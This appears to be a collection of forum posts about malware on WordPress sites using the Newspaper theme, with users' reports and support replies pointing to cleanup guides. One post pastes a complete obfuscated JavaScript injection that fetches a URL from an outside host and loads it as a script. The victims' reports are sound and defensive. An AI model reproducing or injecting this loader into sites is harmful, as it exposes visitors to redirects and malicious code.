No search results were found in Documentation!
When i ask my hosting service provide they told me that this two files are infected… Kindly please tell me what to do..
I have scanned your account and found malicious code injected into the following files:
Code:
[STR]wp_vcd_malware [11/09/18] /public_html/wp-content/themes/Newspaper/functions.php
[STR]wp_vcd_malware [07/09/18] /public_html/wp-includes/wp-vcd.php
Hello,
Just few days back i switch to newspaper9 and when i scan my website with sucuri.net it detects malware on my site stating as: Warning: Malware Detected
Infected with malware. Immediate action is required
https://www.jalewa.com/business/
Definition
rogueads.unwanted_ads?1
Google adwords also disabled my campaign… But when i switch to another theme… malware not found.
Kindly please help me removing the malware
Check the error here: https://sitecheck.sucuri.net/results/www.jalewa.com
Regards,
Abhishek Jalewa
https://www.jalewa.com
Hi, I need your help
I can´t understand what is happening. When I try to customize my theme, I am redirected to this page
Edit widget: Google Analytics Stats Edit Add Google Analytics Stats
Google Analytics Stats

What is this? a Malware?..
please help
thanks
Hi,
Please check:
https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/
Also:
http://securepress.org/tutorial-how-to-remove-malware.php
https://wordpress.org/support/topic/malware-removal
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
I hope this helps.
Hi, a few days ago my site got infected with a malware redirect to a website named cpamatik.com. Two files in the Newspaper theme folder were infected with malicious code causing the redirect: header.php and header-empty.php. I’m still trying to find out how exactly this happened. Could this be related to the Newspaper theme? I’m running Newspaper 8.6 and the latest wordpress (4.9.8). Anyone else encountered something similar?
Hi,
yesterday I bought this new fantastic theme (Newspaper 9) and I’m still configuring it right now.
One problem I have is the one written in the title: when I visit my site (www.ranierisdesk.com) images will not load correctly. Sometimes the thumbnails are missing but not the ones in the slider, sometime the opposite.
In the old theme I used Smush. I disable it and unistalled. Cleared the cache from cloudflare (I don’t use anyalse plugin to generate the cache) and I installed and used the plugin “Regenerate Thumbnails”. Nothing changed.
Maybe is some plugin I have installed that is uncompatible?
Here are the installed and activeted plugins:
– Amazon Associates Link Builder
– Calculated Fields Form
– Classic Editor
– Contact Form 7
– Contact Form 7 MailChimp Extension
– Cookie Notice
– CP Blocks
– Download Monitor
– Email Before Download
– GTranslate
– Jetpack by WordPress.com
– MailChimp per WordPress
– Open external links in a new window
– Regenerate Thumbnails
– Remove Category URL
– Revolution Slider
– tagDiv Composer
– tagDiv Social Counter
– UpdraftPlus – Backup/Restore
– WP Cerber Security, Antispam & Malware Scan
– Yoast SEO
Thanks for the support.
Ranieri
https://forum.tagdiv.com/search/Malware/
https://forum.tagdiv.com/topic/traffictrade-malware-newspaper-8-1-all-updated/
https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/
and etc.
In the most severe cases first: check your own computer for viruses; then treated with a MySQL database of your website; then re-installed WordPress from the official distribution, and only then installed the Newspaper Theme last version.
Hi Support team,
My site has been a victim of the last malware campaign, it has been infected with malware which redirects to a unknown site which install walware on your computer (e.g. unverf.com)
I’ve followed tutorial found on the internet, and in theory had removed the codes in the theme that got infected, however it is still re-directing…. when i switch to a standard theme twnety eleven.. it doesnt happen.
any advise on this?
tnx
JC
My website was attacked by malware
then I delete all file (except wp-config and folder wp-content)
and check site at https://sitecheck.sucuri.net/results/popciz.com#
They found malware
================================================================
malware.generic_jsobfuscator?1.5
================================================================
<div class=”td-container”><script type=’text/javascript’>var _0xa8bd=[“\x47\x45\x54″,”\x6F\x70\x65\x6E”,”\x73\x65\x6E\x64″,”\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74″,”\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70″,”\x6E\x75\x6C\x6C”,”\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x74\x79\x70\x65″,”\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74″,”\x61\x73\x79\x6E\x63″,”\x73\x72\x63″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()}</script></div><script type=”text/javascript”>var _0xa8bd=[“\x47\x45\x54″,”\x6F\x70\x65\x6E”,”\x73\x65\x6E\x64″,”\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74″,”\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70″,”\x6E\x75\x6C\x6C”,”\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x74\x79\x70\x65″,”\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74″,”\x61\x73\x79\x6E\x63″,”\x73\x72\x63″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()}</script><script type=’text/javascript’ src=’http://popciz.com/wp-content/themes/Newspaper/js/tagdiv_theme.min.js?ver=9.0.1′></script>
================================================================
My website >>>>> popciz.com
Thanks
This is highly unusual, so this is happening even without plugins?
I made many tests with buttons, images etc. The links appear as I enter them in my case
– https://www.screencast.com/t/bM8Jj6aXMq
– https://www.screencast.com/t/R6nNqWGgw
In your case both the image and the button have that “goto”in after the initial link, then another URL is added
– https://www.screencast.com/t/p6GdTFKLIhK
If have no idea why that happens, plugins would be the first guess. Did you make any modifications to the theme or added any code in theme files?
Maybe this is a type of malware which redirects your links, you could scan the website
– https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/
Check your system status settings in the theme panel to ensure your hosting setup is sufficient. You will generally need to ensure you have enough memory allocated to run both WP, the theme, TD Composer, and WooCommerce, as well as any other extensions.
If you keep having on/off/on/off problems, you may have faulty caching setup, and/or worth checking your site for malware, by running the free Securi online site scan.
Hello,
Ive purchased the Newspaper 8.8 theme a few minutes ago at Envato Market, downloaded it directly from Envato to my copmuter and checked it for malicious code before uploading to my webserver. It says that it contains the following issues:
Security breaches : Use of base64_decode()
Security breaches : Use of base64_encode()
Presence of iframes : iframes are sometimes used to load unwanted adverts and malicious code on another site
Malware : Operations on file system
Malware : Network operations
Admin menu : Themes should use add_theme_page() for adding admin pages.
Is it safe to install your theme on my new Webserver? Can this code be used to hack my WordPress site or anything like this?
Thanks in advance!
Greetings
I am having problems with ad redirects on my website. I just did some scanning and 2 out of 3 scans show me this. http://prntscr.com/kcq3ye
Is there a possibility that newspaper theme is to blame? The malware started since the last update.
It seems to appear right below this ad – https://www.screencast.com/t/wBxKcAIO
It is invisible because of some CSS positioning it outside of the actual page, but it still loads.
From what I can find online this could be a type of malware that infected the website
– https://stackoverflow.com/questions/42901355/malicious-text-appears-in-all-pages-and-posts-how-do-i-get-rid-of-it
– https://wordpress.org/support/topic/known-javascript-malware-details-httpsucuri-netmalwareentrymwspamseos/
Users with a similar issue in those topics mention that a plugin might be the cause downloaded from various sources. You could try to deactivate them all, leave only theme plugins active. Then if you have caching, clear it. Check if the text still displays in the AMP page for example.
Likely want to remove the javascript if you didn’t add it; then check your site with securi scanner for possible malware, change all your passwords, and make sure you have updated WP for the latest security flaw patched this week!
Also consider ‘hardening’ your website per the topic in the official WordPress docs on wordpress.org
This just received from Google:
Google has detected harmful content on some of your site’s pages. We recommend that you remove it as soon as possible. Until then, browsers such as Google Chrome will display a warning when users visit or download certain files from your site.
Deceptive Pages
These pages attempt to trick users into doing something dangerous such as installing unwanted software or revealing personal information.
I have no idea what they’re talking about. They don’t give you an direct answer, but just “samples” of so-called
deceptive ads. The only ads I have on the site is their ads. They want me to get a security agent to inspect the
site. No one has access to the site, but myself. If anyone is introducing malware, I’m not aware of it.
I’m not going to say here I really feel about all of this as I’m trying to be civil, but I’m just about to the
end of my rope with all of this.
Thanks,
Larry
Hi. I developed aicf.org with Newspaper. At the time the version of the theme was 6. For a while we tried updating the theme but the site’s design got heavily compromised even though our work was clean with a properly configured with a child theme. We had to make a decision with our client and we said we’ll keep it at version 6. Yesterday we got hit with malware due to vulnerability in your theme. I know you fixed it in subsequent versions, but we can’t really upgrade. Is there a solution you can think of to help us out here? Maybe a patch to fix this vulnerability and block the code from working?
Hi,
There are multiple topics in the matter on the forum, example
– https://forum.tagdiv.com/topic/possible-malware-asociated-to-some-newspaper-sites/
We will try to think of a solution for the placeholder images used by the tagDiv composer, since this is so requested by our users. Sorry for any inconvenience caused.
Thanks
That is not malware. The images are placeholders for the td multipurpose plugin which has now been merged with td composer. The images cannot be deleted and that’s why they recur after you delete. The Tagdiv team says they will provide an option to disable the images in the next update.
Hello. I am having some trouble with something I consider is malware.
I have a blog running Newspaper theme and when I go to Media Library, there are some pictures in the media library that I have not uploaded. When I try to delete them, they show up again. I have tried to manually delete them from the server and still, they are there once again.
The images are named like tdm_pic_9.jpg or similar. When I search for that name in Google, I can find some results like:
https://disidentia.com/wp-content/uploads/tdm_pic_9.jpg
http://institutodelverboencarnado.org/tdm_pic_9/
https://www.hola.tv/tdm_pic_9/
http://www.planificaelviajeperfecto.es/tdm_pic_9/
http://www.gurutecno.com/wp-content/uploads/tdm_pic_9.jpg
And several more. All these sites use Newspaper. Can you please tell me what’s happening with your theme?
1. Please keep in mind that theme has no infected. To be sure, you should re-download the latest theme version for Theme Forest and make a new clean install from scratch via FTP way because this is the subject theme method in this case (https://forum.tagdiv.com/install-via-ftp/).
2. Also read carefully this forum thread: https://forum.tagdiv.com/topic/traffictrade-malware-newspaper-8-1-all-updated/
Hi,
The functions file belongs to the theme, the other two would be WordPress files. If you have problems with malware you should immediately take action
– https://codex.wordpress.org/Hardening_WordPress
– http://www.wpbeginner.com/wordpress-security/
There are guides about what you should do to prevent such issues and also fix them. This is a guide posted by a theme user, but there are many others online
– https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/
Check them carefully and try to fix the problems.
Missing these files, Can you please tell me the issue, malware attacks these files
public_html/girgitnews.com/wp-content/themes/Newspaper/functions.php
public_html/girgitnews.com/wp-includes/wp-vcd.php
public_html/girgitnews.com/wp-includes/post.php
Hello Vichy,
Please notice that our theme is very safe. Please check the following useful guides from here -> http://securepress.org/tutorial-how-to-remove-malware.php -> https://wordpress.org/support/topic/malware-removal -> https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/ where you will learn how to increase and maintain the security of your website.
Thanks for your understanding!
Hello,
I can assure you we do not make any requests to external resources. We do not know what ‘optimum.net’ is.
In this case I would advice tightening security and cleaning your install. You may be facing a malware problem. You can use these guides to help out:
http://securepress.org/tutorial-how-to-remove-malware.php
https://wordpress.org/support/topic/malware-removal
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
Here is a user submitted topic for best WordPress security practices:
https://forum.tagdiv.com/topic/tutorial-good-basic-security-practices/
Thank you!